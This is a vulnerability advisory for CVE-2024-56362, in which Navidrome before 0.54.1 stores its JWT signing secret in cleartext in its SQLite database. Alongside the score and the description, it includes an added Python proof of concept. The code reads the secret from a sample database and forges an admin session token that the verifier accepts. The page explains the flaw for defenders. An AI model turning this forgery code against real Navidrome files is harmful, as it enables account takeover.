CVE-2024-56362 HIGH

CVE-2024-56362: Navidrome Stores JWT Secret in Plaintext in navidrome.db

Vendor Navidrome
Product navidrome
Weakness CWE-312 · Cleartext Storage of Sensitive Information
Published December 23, 2024
Last update December 24, 2024

CVSS base score

7.1/10
Attack vector Local
Attack complexity Low
Privileges required Low
User interaction None
Scope Unchanged
Confidentiality High
Integrity High
Availability None

CVSS vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

What the vulnerability does

Description

Navidrome is an open source web-based music collection server and streamer. In versions before 0.54.1, Navidrome stores the secret it uses to sign its JWT session tokens in cleartext in the property table of the navidrome.db SQLite database file. Anyone who can read that file (another local account on the host, a shared volume, a backup, a copied container layer) can recover the secret and, with it, forge authentication tokens that the server will accept; that is why the score carries high confidentiality and integrity impact despite requiring only local access with low privileges. The vulnerability is fixed in 0.54.1. If the database file may already have been read by an untrusted party, treat the secret as compromised rather than relying on the upgrade alone.
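The following is an added illustration, not code from the advisory or from the Navidrome project. It models the exposure in plain Python: a constructed in-memory stand-in for navidrome.db, a read of the secret exactly as anyone with file access would see it, and an HS256 token forged with that secret which the server-side verifier then accepts. The table layout (`property` with `id` and `value` columns), the row id `JWTSecret`, the HS256 algorithm and the claim names are all assumptions made for the example; the advisory itself states only that the secret sits in cleartext in the property table.

```python
"""Cleartext JWT secret at rest: why CWE-312 here means token forgery.

Added example with assumed schema and identifiers; see comments.
"""
import base64
import hashlib
import hmac
import json
import sqlite3
import time
from typing import Optional

# ASSUMPTIONS (not from the advisory): the property table is
# (id TEXT PRIMARY KEY, value TEXT) and the signing secret is stored
# under the id "JWTSecret".
PROPERTY_TABLE = "property"
JWT_SECRET_ID = "JWTSecret"


def build_sample_db(secret: str) -> sqlite3.Connection:
    """Constructed in-memory stand-in for navidrome.db (sample data only)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(f"CREATE TABLE {PROPERTY_TABLE} (id TEXT PRIMARY KEY, value TEXT)")
    conn.executemany(
        f"INSERT INTO {PROPERTY_TABLE} (id, value) VALUES (?, ?)",
        [("LastScan", "2024-12-20T10:00:00Z"), (JWT_SECRET_ID, secret)],
    )
    conn.commit()
    return conn


def read_stored_secret(conn: sqlite3.Connection) -> Optional[str]:
    """Return the secret as anyone with read access to the file sees it."""
    row = conn.execute(
        f"SELECT value FROM {PROPERTY_TABLE} WHERE id = ?", (JWT_SECRET_ID,)
    ).fetchone()
    return row[0] if row else None


def _b64url(data: bytes) -> str:
    """Base64url without padding, as JWT requires."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def forge_hs256_token(secret: str, claims: dict) -> str:
    """Sign arbitrary claims with a recovered secret.

    Any verifier that checks HS256 signatures with this secret accepts
    the result. Claim names are illustrative, not Navidrome's actual set.
    """
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret.encode(), f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(sig)}"


def verify_hs256_token(secret: str, token: str) -> Optional[dict]:
    """Server-side check: recompute the MAC; return the claims only if it matches."""
    try:
        header, payload, sig = token.split(".")
    except ValueError:
        return None
    expected = hmac.new(secret.encode(), f"{header}.{payload}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(_b64url(expected), sig):
        return None
    padded = payload + "=" * (-len(payload) % 4)
    return json.loads(base64.urlsafe_b64decode(padded))


def demo() -> Optional[dict]:
    """Attacker reads the file, forges an admin token, server accepts it."""
    server_secret = "constructed-sample-secret"  # stand-in for the real random secret
    conn = build_sample_db(server_secret)
    leaked = read_stored_secret(conn)            # what file access alone yields
    token = forge_hs256_token(
        leaked, {"sub": "admin", "adm": True, "exp": int(time.time()) + 3600}
    )
    return verify_hs256_token(server_secret, token)


if __name__ == "__main__":
    print(demo())
```

The point of the verifier being in the same block is to show that nothing on the server side can tell a forged token from a legitimate one once the secret is known: the integrity of every session rests entirely on the confidentiality of that one row. Encrypting the value at rest, or keeping it outside the database, is what removes file-read access from the attack path.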

Key dates

Disclosure timeline

December 23, 2024 CVE published
December 24, 2024 Record updated